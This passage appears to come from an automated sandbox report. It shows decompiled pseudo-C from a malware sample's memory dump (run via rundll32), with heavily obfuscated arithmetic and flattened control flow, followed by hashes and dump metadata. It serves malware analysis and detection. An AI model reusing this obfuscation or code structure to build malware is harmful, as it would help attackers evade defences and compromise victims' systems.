                                                                                                                    				_v1160 = _v1160 + 0x85f3;
                                                                                                                    				_t272 = 0x2a;
                                                                                                                    				_v1160 = _v1160 / _t272;
                                                                                                                    				_v1160 = _v1160 ^ 0x000b1184;
                                                                                                                    				_t310 = 0xb516bbb;
                                                                                                                    				_v1060 = 0xeb49a4;
                                                                                                                    				_v1060 = _v1060 >> 5;
                                                                                                                    				_v1060 = _v1060 ^ 0x00095d90;
                                                                                                                    				_v1136 = 0x74fb0a;
                                                                                                                    				_t273 = 0x7f;
                                                                                                                    				_v1136 = _v1136 * 0x1e;
                                                                                                                    				_v1136 = _v1136 ^ 0x978de9ec;
                                                                                                                    				_v1136 = _v1136 ^ 0xad10b4f2;
                                                                                                                    				_v1136 = _v1136 ^ 0x372b3a8e;
                                                                                                                    				_v1152 = 0xb92c6e;
                                                                                                                    				_v1152 = _v1152 ^ 0x0e0e3092;
                                                                                                                    				_v1152 = _v1152 | 0x72fa6aba;
                                                                                                                    				_v1152 = _v1152 + 0xffff103c;
                                                                                                                    				_v1152 = _v1152 ^ 0x7efa5fdf;
                                                                                                                    				_v1128 = 0x794cf8;
                                                                                                                    				_v1128 = _v1128 ^ 0x9a366bfc;
                                                                                                                    				_v1128 = _v1128 + 0xde36;
                                                                                                                    				_v1128 = _v1128 ^ 0x5c71c30d;
                                                                                                                    				_v1128 = _v1128 ^ 0xc6263e62;
                                                                                                                    				_v1156 = 0x79c02;
                                                                                                                    				_v1156 = _v1156 + 0xfffffb46;
                                                                                                                    				_v1156 = _v1156 | 0x060cf66c;
                                                                                                                    				_v1156 = _v1156 ^ 0x799dfdb7;
                                                                                                                    				_v1156 = _v1156 ^ 0x7f9bfbef;
                                                                                                                    				_v1164 = 0xbfcf15;
                                                                                                                    				_v1164 = _v1164 >> 3;
                                                                                                                    				_v1164 = _v1164 << 0xc;
                                                                                                                    				_v1164 = _v1164 << 3;
                                                                                                                    				_v1164 = _v1164 ^ 0xfcf89fe4;
                                                                                                                    				_v1112 = 0xe0c8d1;
                                                                                                                    				_v1112 = _v1112 ^ 0xbad245c5;
                                                                                                                    				_v1112 = _v1112 << 5;
                                                                                                                    				_v1112 = _v1112 ^ 0x4653cc84;
                                                                                                                    				_v1116 = 0x38a8e4;
                                                                                                                    				_v1116 = _v1116 + 0xffff2cc2;
                                                                                                                    				_v1116 = _v1116 + 0x453c;
                                                                                                                    				_v1116 = _v1116 ^ 0x0030e111;
                                                                                                                    				_v1144 = 0x8706d;
                                                                                                                    				_v1144 = _v1144 | 0x44a168a8;
                                                                                                                    				_v1144 = _v1144 * 0x4d;
                                                                                                                    				_v1144 = _v1144 >> 0x10;
                                                                                                                    				_v1144 = _v1144 ^ 0x0002b082;
                                                                                                                    				_v1068 = 0x3ad283;
                                                                                                                    				_v1068 = _v1068 + 0xc4d8;
                                                                                                                    				_v1068 = _v1068 ^ 0x003ad5e6;
                                                                                                                    				_v1148 = 0xbbdd96;
                                                                                                                    				_v1148 = _v1148 / _t273;
                                                                                                                    				_v1148 = _v1148 + 0xffff10a8;
                                                                                                                    				_v1148 = _v1148 + 0xdbb9;
                                                                                                                    				_v1148 = _v1148 ^ 0x00089235;
                                                                                                                    				_v1084 = 0xf8cace;
                                                                                                                    				_v1084 = _v1084 ^ 0x230d76f6;
                                                                                                                    				_v1084 = _v1084 ^ 0x23f29212;
                                                                                                                    				_v1140 = 0x18cea;
                                                                                                                    				_v1140 = _v1140 << 3;
                                                                                                                    				_v1140 = _v1140 << 0xa;
                                                                                                                    				_v1140 = _v1140 + 0xffff66c6;
                                                                                                                    				_v1140 = _v1140 ^ 0x3196ba0a;
                                                                                                                    				_v1104 = 0x64ea4d;
                                                                                                                    				_v1104 = _v1104 >> 0xe;
                                                                                                                    				_v1104 = _v1104 << 0x10;
                                                                                                                    				_v1104 = _v1104 ^ 0x01951052;
                                                                                                                    				_v1120 = 0x40e961;
                                                                                                                    				_v1120 = _v1120 ^ 0xb7fb83c2;
                                                                                                                    				_v1120 = _v1120 + 0xb75e;
                                                                                                                    				_v1120 = _v1120 ^ 0xb7bbc099;
                                                                                                                    				_v1096 = 0x7779e0;
                                                                                                                    				_v1096 = _v1096 | 0x86983bb4;
                                                                                                                    				_v1096 = _v1096 ^ 0x86f0c1f2;
                                                                                                                    				_v1100 = 0xda5543;
                                                                                                                    				_v1100 = _v1100 + 0xffff2368;
                                                                                                                    				_v1100 = _v1100 + 0xffff6302;
                                                                                                                    				_v1100 = _v1100 ^ 0x00d61d50;
                                                                                                                    				_v1132 = 0x843ae5;
                                                                                                                    				_v1132 = _v1132 + 0xae05;
                                                                                                                    				_v1132 = _v1132 >> 9;
                                                                                                                    				_v1132 = _v1132 | 0xb52a1de5;
                                                                                                                    				_v1132 = _v1132 ^ 0xb5269cc0;
                                                                                                                    				_v1064 = 0x4bdca1;
                                                                                                                    				_t274 = 0x36;
                                                                                                                    				_v1064 = _v1064 * 0x2d;
                                                                                                                    				_v1064 = _v1064 ^ 0x0d50802d;
                                                                                                                    				_v1076 = 0xc70263;
                                                                                                                    				_v1076 = _v1076 ^ 0xed1c16c4;
                                                                                                                    				_v1076 = _v1076 ^ 0xeddf4f32;
                                                                                                                    				_v1108 = 0x3676a5;
                                                                                                                    				_v1108 = _v1108 << 0x10;
                                                                                                                    				_v1108 = _v1108 << 8;
                                                                                                                    				_v1108 = _v1108 ^ 0xa501f64e;
                                                                                                                    				_v1088 = 0x1a5bc1;
                                                                                                                    				_v1088 = _v1088 / _t274;
                                                                                                                    				_v1088 = _v1088 ^ 0x00023ab9;
                                                                                                                    				_v1092 = 0xcce8ca;
                                                                                                                    				_v1092 = _v1092 + 0xffff41cd;
                                                                                                                    				_v1092 = _v1092 ^ 0x00c96fdb;
                                                                                                                    				_v1072 = 0x26dee9;
                                                                                                                    				_t275 = 0x31;
                                                                                                                    				_v1072 = _v1072 * 0x7c;
                                                                                                                    				_v1072 = _v1072 ^ 0x12da7d33;
                                                                                                                    				_v1124 = 0xc51f8;
                                                                                                                    				_v1124 = _v1124 * 0x7c;
                                                                                                                    				_v1124 = _v1124 | 0x22e20644;
                                                                                                                    				_v1124 = _v1124 + 0xffff053d;
                                                                                                                    				_v1124 = _v1124 ^ 0x27f3e63a;
                                                                                                                    				_v1080 = 0x33633f;
                                                                                                                    				_v1080 = _v1080 / _t275;
                                                                                                                    				_v1080 = _v1080 ^ 0x000716b7;
                                                                                                                    				E00345C73(_t275);
                                                                                                                    				do {
                                                                                                                    					while(_t310 != 0xc63ed) {
                                                                                                                    						if(_t310 == 0x5b9c87d) {
                                                                                                                    							_push(_v1104);
                                                                                                                    							_push(_v1140);
                                                                                                                    							_t263 = E0034DCF7(_v1084, 0x331060, __eflags);
                                                                                                                    							_t264 = E0034D25E(_v1120);
                                                                                                                    							_t282 =  *0x353e10; // 0x0
                                                                                                                    							_t265 =  *0x353e10; // 0x0
                                                                                                                    							E0034453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
                                                                                                                    							_t268 = E0033A8B0(_v1088, _t263, _v1092);
                                                                                                                    							_t314 =  &(_t314[0xa]);
                                                                                                                    							_t310 = 0xc63ed;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t310 == 0xb516bbb) {
                                                                                                                    								_t310 = 0xc84e726;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								_t319 = _t310 - 0xc84e726;
                                                                                                                    								if(_t310 == 0xc84e726) {
                                                                                                                    									_push(_v1128);
                                                                                                                    									_push(_v1152);
                                                                                                                    									_t269 = E0034DCF7(_v1136, 0x331000, _t319);
                                                                                                                    									_t289 =  *0x353e10; // 0x0
                                                                                                                    									_t306 =  *0x353e10; // 0x0
                                                                                                                    									E003347CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                    									_t268 = E0033A8B0(_v1068, _t269, _v1148);
                                                                                                                    									_t314 =  &(_t314[9]);
                                                                                                                    									_t310 = 0x5b9c87d;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					_push(_v1080);
                                                                                                                    					_push( &_v1040);
                                                                                                                    					_push(_v1124);
                                                                                                                    					E003513AD(_v1072,  &_v520, __eflags);
                                                                                                                    					_t314 =  &(_t314[3]);
                                                                                                                    					_t310 = 0xafb2886;
                                                                                                                    					L9:
                                                                                                                    					__eflags = _t310 - 0xafb2886;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				return _t268;
                                                                                                                    			}
                                                                                                                    0x00346a3e
                                                                                                                    0x00346a4c
                                                                                                                    0x00346a50
                                                                                                                    0x00346a60
                                                                                                                    0x00346a74
                                                                                                                    0x00346a74
                                                                                                                    0x00346a82
                                                                                                                    0x00346b0d
                                                                                                                    0x00346b16
                                                                                                                    0x00346b1e
                                                                                                                    0x00346b2f
                                                                                                                    0x00346b34
                                                                                                                    0x00346b47
                                                                                                                    0x00346b6a
                                                                                                                    0x00346b7c
                                                                                                                    0x00346b81
                                                                                                                    0x00346b84
                                                                                                                    0x00000000
                                                                                                                    0x00346a88
                                                                                                                    0x00346a8e
                                                                                                                    0x00346b06
                                                                                                                    0x00000000
                                                                                                                    0x00346a90
                                                                                                                    0x00346a90
                                                                                                                    0x00346a92
                                                                                                                    0x00346a98
                                                                                                                    0x00346aa1
                                                                                                                    0x00346aa9
                                                                                                                    0x00346aba
                                                                                                                    0x00346ad2
                                                                                                                    0x00346ae5
                                                                                                                    0x00346af7
                                                                                                                    0x00346afc
                                                                                                                    0x00346aff
                                                                                                                    0x00000000
                                                                                                                    0x00346aff
                                                                                                                    0x00346a92
                                                                                                                    0x00346a8e
                                                                                                                    0x00000000
                                                                                                                    0x00346a82
                                                                                                                    0x00346b8e
                                                                                                                    0x00346b99
                                                                                                                    0x00346b9a
                                                                                                                    0x00346ba9
                                                                                                                    0x00346bae
                                                                                                                    0x00346bb1
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bb3
                                                                                                                    0x00346bc5

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <E$Md$a@$yw
                                                                                                                    • API String ID: 0-2092248880
                                                                                                                    • Opcode ID: ad609723df5e02ec01d019389cc11f1a7ba2aa242d7f7f8febdee97ff08d70b8
                                                                                                                    • Instruction ID: d929c29401602515a1f4e2e178676795fe9af9137d909203de02d79cc1c10e02
                                                                                                                    • Opcode Fuzzy Hash: ad609723df5e02ec01d019389cc11f1a7ba2aa242d7f7f8febdee97ff08d70b8
                                                                                                                    • Instruction Fuzzy Hash: 88C120B24087809FD369CF25C58A81BBBF2FB94758F108A1DF5A59A260D3B59909CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00335548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                    				char _v16;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				char _v28;
                                                                                                                    				char _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				intOrPtr _v52;
                                                                                                                    				intOrPtr _v56;
                                                                                                                    				char _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				char _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				unsigned int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				void* __ecx;
                                                                                                                    				void* _t190;
                                                                                                                    				void* _t206;
                                                                                                                    				void* _t208;
                                                                                                                    				signed int _t209;
                                                                                                                    				char* _t211;
                                                                                                                    				signed int _t212;
                                                                                                                    				intOrPtr _t222;
                                                                                                                    				intOrPtr* _t225;
                                                                                                                    				void* _t227;
                                                                                                                    				char* _t229;
                                                                                                                    				char _t233;
                                                                                                                    				intOrPtr _t255;
                                                                                                                    				intOrPtr* _t257;
                                                                                                                    				signed int _t258;
                                                                                                                    				signed int _t259;
                                                                                                                    				signed int _t260;
                                                                                                                    				signed int* _t263;
                                                                                                                    
                                                                                                                    				_t225 = _a16;
                                                                                                                    				_t257 = _a4;
                                                                                                                    				_push(_t225);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_t257);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t190);
                                                                                                                    				_v56 = 0xb9e7cb;
                                                                                                                    				_t255 = 0;
                                                                                                                    				_v52 = 0x6e87b5;
                                                                                                                    				_t263 =  &(( &_v148)[6]);
                                                                                                                    				_v48 = 0;
                                                                                                                    				_v44 = 0;
                                                                                                                    				_t227 = 0x3ccc1e9;
                                                                                                                    				_v128 = 0x85629b;
                                                                                                                    				_t258 = 0x62;
                                                                                                                    				_v128 = _v128 * 0x5a;
                                                                                                                    				_v128 = _v128 + 0xfbaf;
                                                                                                                    				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                    				_v144 = 0xfc0c7f;
                                                                                                                    				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                    				_v144 = _v144 >> 1;
                                                                                                                    				_v144 = _v144 | 0x14143ad1;
                                                                                                                    				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                    				_v96 = 0xd1f565;
                                                                                                                    				_v96 = _v96 * 0x21;
                                                                                                                    				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                    				_v104 = 0xb219e8;
                                                                                                                    				_v104 = _v104 | 0x75a31cc8;
                                                                                                                    				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                    				_v80 = 0x6fb9b6;
                                                                                                                    				_v80 = _v80 * 0x3e;
                                                                                                                    				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                    				_v132 = 0x1154a0;
                                                                                                                    				_v132 = _v132 << 0xb;
                                                                                                                    				_v132 = _v132 + 0xfffffde8;
                                                                                                                    				_v132 = _v132 | 0xd1d436bb;
                                                                                                                    				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                    				_v76 = 0x5374cd;
                                                                                                                    				_v76 = _v76 << 2;
                                                                                                                    				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                    				_v140 = 0x35e68a;
                                                                                                                    				_v140 = _v140 + 0xffff467d;
                                                                                                                    				_v140 = _v140 * 0x7c;
                                                                                                                    				_v140 = _v140 ^ 0x566bba39;
                                                                                                                    				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                    				_v124 = 0xf91357;
                                                                                                                    				_v124 = _v124 << 0xf;
                                                                                                                    				_v124 = _v124 + 0xf2e4;
                                                                                                                    				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                    				_v112 = 0xf055e4;
                                                                                                                    				_v112 = _v112 ^ 0x101963ca;
                                                                                                                    				_v112 = _v112 | 0x7be8ad21;
                                                                                                                    				_v112 = _v112 ^ 0x7be17431;
                                                                                                                    				_v84 = 0x17393b;
                                                                                                                    				_v84 = _v84 << 6;
                                                                                                                    				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                    				_v120 = 0xf688ab;
                                                                                                                    				_v120 = _v120 / _t258;
                                                                                                                    				_v120 = _v120 * 0x2d;
                                                                                                                    				_v120 = _v120 ^ 0x00718a36;
                                                                                                                    				_v116 = 0xa21f51;
                                                                                                                    				_v116 = _v116 + 0x3c3b;
                                                                                                                    				_v116 = _v116 >> 0xa;
                                                                                                                    				_v116 = _v116 ^ 0x0006c391;
                                                                                                                    				_v88 = 0x51e239;
                                                                                                                    				_v88 = _v88 + 0x2ec0;
                                                                                                                    				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                    				_v136 = 0xa92d92;
                                                                                                                    				_v136 = _v136 >> 0xd;
                                                                                                                    				_v136 = _v136 ^ 0x0647b396;
                                                                                                                    				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                    				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                    				_v108 = 0xb50576;
                                                                                                                    				_t259 = 0x45;
                                                                                                                    				_v108 = _v108 / _t259;
                                                                                                                    				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                    				_v108 = _v108 ^ 0xb943792d;
                                                                                                                    				_v148 = 0xb9b260;
                                                                                                                    				_t260 = 0x14;
                                                                                                                    				_v148 = _v148 / _t260;
                                                                                                                    				_v148 = _v148 * 0x3f;
                                                                                                                    				_v148 = _v148 >> 2;
                                                                                                                    				_v148 = _v148 ^ 0x009e914b;
                                                                                                                    				_v92 = 0x6e7d65;
                                                                                                                    				_v92 = _v92 | 0xb573042f;
                                                                                                                    				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                    				_v100 = 0xfd8f7e;
                                                                                                                    				_v100 = _v100 * 0x5d;
                                                                                                                    				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                    				L1:
                                                                                                                    				while(_t227 != 0x3c16ad4) {
                                                                                                                    					if(_t227 == 0x3ccc1e9) {
                                                                                                                    						_t227 = 0x7dbf5b4;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t227 == 0x79abc1a) {
                                                                                                                    						_t229 =  &_v28;
                                                                                                                    						_t208 = E0033AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                    						_t263 =  &(_t263[4]);
                                                                                                                    						if(_t208 != 0) {
                                                                                                                    							_push(_t229);
                                                                                                                    							_push(_t229);
                                                                                                                    							_t222 = E00337FF2(_v24);
                                                                                                                    							 *_t257 = _t222;
                                                                                                                    							if(_t222 != 0) {
                                                                                                                    								E0033ED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                    								_t263 =  &(_t263[3]);
                                                                                                                    								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                    								_t255 = 1;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t227 = 0xdaef9d5;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t227 == 0x7dbf5b4) {
                                                                                                                    						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                    						_t233 =  *_t225;
                                                                                                                    						_v68 = _t209;
                                                                                                                    						_v72 = _t233;
                                                                                                                    						_t211 = _t209 - 1 + _t233;
                                                                                                                    						while(_t211 > _t233) {
                                                                                                                    							if( *_t211 == 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t211 = _t211 - 1;
                                                                                                                    						}
                                                                                                                    						_t212 = _t211 - _t233;
                                                                                                                    						_v68 = _t212;
                                                                                                                    						if(_t212 == 0) {
                                                                                                                    							L16:
                                                                                                                    							_t227 = 0xfc35b14;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						while(_v68 % _v144 != _v128) {
                                                                                                                    							_t163 =  &_v68;
                                                                                                                    							 *_t163 = _v68 - 1;
                                                                                                                    							if( *_t163 != 0) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							goto L16;
                                                                                                                    						}
                                                                                                                    						goto L16;
                                                                                                                    					}
                                                                                                                    					if(_t227 == 0xdaef9d5) {
                                                                                                                    						E00348519(_v92, _v100, _v64);
                                                                                                                    						L28:
                                                                                                                    						return _t255;
                                                                                                                    					}
                                                                                                                    					if(_t227 != 0xfc35b14) {
                                                                                                                    						L25:
                                                                                                                    						if(_t227 != 0xb843ed5) {
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						goto L28;
                                                                                                                    					}
                                                                                                                    					if(E00335E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                    						goto L28;
                                                                                                                    					}
                                                                                                                    					_t227 = 0x3c16ad4;
                                                                                                                    				}
                                                                                                                    				_t206 = E00338B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                    				_t263 =  &(_t263[4]);
                                                                                                                    				if(_t206 == 0) {
                                                                                                                    					_t227 = 0xdaef9d5;
                                                                                                                    					goto L25;
                                                                                                                    				}
                                                                                                                    				_t227 = 0x79abc1a;
                                                                                                                    				goto L1;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1t{$9Q$;<$e}n
                                                                                                                    • API String ID: 0-2095593254
                                                                                                                    • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                    • Instruction ID: 0ee51a938fca8ddedf3946039bc2142c483804f526292a7d00c5f30e50200105
                                                                                                                    • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                    • Instruction Fuzzy Hash: 15B140B1108381DFC329CF26C58591BBBF1FBC4748F50891DF6969A260D7B18A4ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00347DD5() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				signed int _v1044;
                                                                                                                    				signed int _v1048;
                                                                                                                    				intOrPtr _v1052;
                                                                                                                    				intOrPtr _v1056;
                                                                                                                    				unsigned int _v1060;
                                                                                                                    				signed int _v1064;
                                                                                                                    				signed int _v1068;
                                                                                                                    				signed int _v1072;
                                                                                                                    				signed int _v1076;
                                                                                                                    				signed int _v1080;
                                                                                                                    				signed int _v1084;
                                                                                                                    				signed int _v1088;
                                                                                                                    				signed int _v1092;
                                                                                                                    				signed int _v1096;
                                                                                                                    				signed int _v1100;
                                                                                                                    				signed int _v1104;
                                                                                                                    				signed int _v1108;
                                                                                                                    				signed int _v1112;
                                                                                                                    				signed int _v1116;
                                                                                                                    				signed int _v1120;
                                                                                                                    				signed int _v1124;
                                                                                                                    				signed int _v1128;
                                                                                                                    				signed int _v1132;
                                                                                                                    				signed int _v1136;
                                                                                                                    				signed int _v1140;
                                                                                                                    				signed int _v1144;
                                                                                                                    				signed int _v1148;
                                                                                                                    				signed int _v1152;
                                                                                                                    				signed int _v1156;
                                                                                                                    				intOrPtr _t236;
                                                                                                                    				void* _t241;
                                                                                                                    				short* _t244;
                                                                                                                    				void* _t247;
                                                                                                                    				void* _t250;
                                                                                                                    				intOrPtr _t256;
                                                                                                                    				intOrPtr _t272;
                                                                                                                    				signed int _t278;
                                                                                                                    				signed int _t279;
                                                                                                                    				signed int _t280;
                                                                                                                    				signed int* _t283;
                                                                                                                    
                                                                                                                    				_t283 =  &_v1156;
                                                                                                                    				_v1048 = _v1048 & 0x00000000;
                                                                                                                    				_v1044 = _v1044 & 0x00000000;
                                                                                                                    				_t250 = 0x1242b9;
                                                                                                                    				_v1056 = 0xc74a30;
                                                                                                                    				_v1052 = 0xdc93e6;
                                                                                                                    				_v1140 = 0x94ae82;
                                                                                                                    				_v1140 = _v1140 * 0x5d;
                                                                                                                    				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                    				_t278 = 0x3b;
                                                                                                                    				_v1140 = _v1140 / _t278;
                                                                                                                    				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                    				_v1060 = 0xf2c7d8;
                                                                                                                    				_v1060 = _v1060 >> 0xe;
                                                                                                                    				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                    				_v1084 = 0xadf7c1;
                                                                                                                    				_v1084 = _v1084 >> 7;
                                                                                                                    				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                    				_v1068 = 0x4ca2f2;
                                                                                                                    				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                    				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                    				_v1148 = 0xfaa01c;
                                                                                                                    				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                    				_t279 = 0x3d;
                                                                                                                    				_v1148 = _v1148 / _t279;
                                                                                                                    				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                    				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                    				_v1104 = 0xbd50a4;
                                                                                                                    				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                    				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                    				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                    				_v1096 = 0x4ec4a;
                                                                                                                    				_t280 = 0x27;
                                                                                                                    				_v1096 = _v1096 / _t280;
                                                                                                                    				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                    				_v1156 = 0x496e13;
                                                                                                                    				_v1156 = _v1156 << 0xb;
                                                                                                                    				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                    				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                    				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                    				_v1132 = 0x5417d7;
                                                                                                                    				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                    				_v1132 = _v1132 * 0x11;
                                                                                                                    				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                    				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                    				_v1108 = 0x3d434d;
                                                                                                                    				_t83 =  &_v1108; // 0x3d434d
                                                                                                                    				_v1108 =  *_t83 * 0x5d;
                                                                                                                    				_v1108 = _v1108 + 0xbd1d;
                                                                                                                    				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                    				_v1064 = 0x905f90;
                                                                                                                    				_v1064 = _v1064 << 7;
                                                                                                                    				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                    				_v1076 = 0xa70fe8;
                                                                                                                    				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                    				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                    				_v1144 = 0x5add64;
                                                                                                                    				_v1144 = _v1144 * 0x72;
                                                                                                                    				_v1144 = _v1144 >> 2;
                                                                                                                    				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                    				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                    				_v1112 = 0xa934e1;
                                                                                                                    				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                    				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                    				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                    				_v1152 = 0xfe7bab;
                                                                                                                    				_v1152 = _v1152 + 0xffffe121;
                                                                                                                    				_v1152 = _v1152 << 7;
                                                                                                                    				_v1152 = _v1152 + 0xffffae88;
                                                                                                                    				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                    				_v1092 = 0x242707;
                                                                                                                    				_v1092 = _v1092 >> 6;
                                                                                                                    				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                    				_v1136 = 0xebac4f;
                                                                                                                    				_v1136 = _v1136 + 0x4c15;
                                                                                                                    				_v1136 = _v1136 >> 0xf;
                                                                                                                    				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                    				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                    				_v1120 = 0x4eb7ab;
                                                                                                                    				_v1120 = _v1120 << 2;
                                                                                                                    				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                    				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                    				_v1088 = 0xc2f923;
                                                                                                                    				_v1088 = _v1088 * 0xf;
                                                                                                                    				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                    				_v1080 = 0xbf02c1;
                                                                                                                    				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                    				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                    				_v1128 = 0xfef10;
                                                                                                                    				_v1128 = _v1128 + 0xfa25;
                                                                                                                    				_v1128 = _v1128 + 0xffffb342;
                                                                                                                    				_v1128 = _v1128 + 0x2fe7;
                                                                                                                    				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                    				_v1116 = 0x30091d;
                                                                                                                    				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                    				_v1116 = _v1116 * 0xf;
                                                                                                                    				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                    				_v1100 = 0xdd7fbe;
                                                                                                                    				_v1100 = _v1100 >> 0xf;
